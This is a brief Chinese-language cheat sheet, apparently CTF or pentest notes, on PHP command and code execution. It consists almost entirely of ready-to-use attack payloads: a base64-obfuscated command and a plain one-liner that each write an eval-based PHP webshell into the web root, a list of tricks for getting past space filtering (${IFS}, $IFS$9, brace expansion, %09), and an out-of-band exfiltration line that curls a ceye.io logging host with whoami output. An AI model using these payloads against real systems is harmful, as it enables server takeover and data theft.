php代码执行&命令执行
getshell
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
echo <?php eval(@$_POST[1]); ?> >1.php
bypass
绕过空格 > < <> 重定向符 %09(需要php环境) ${IFS} $IFS$9 {cat,flag.php} //用逗号实现了空格功能 %20 %09
外带 curl xxxx.ceye.io/
whoami
参考
https://www.cnblogs.com/NPFS/p/13279815.html
https://www.anquanke.com/post/id/84920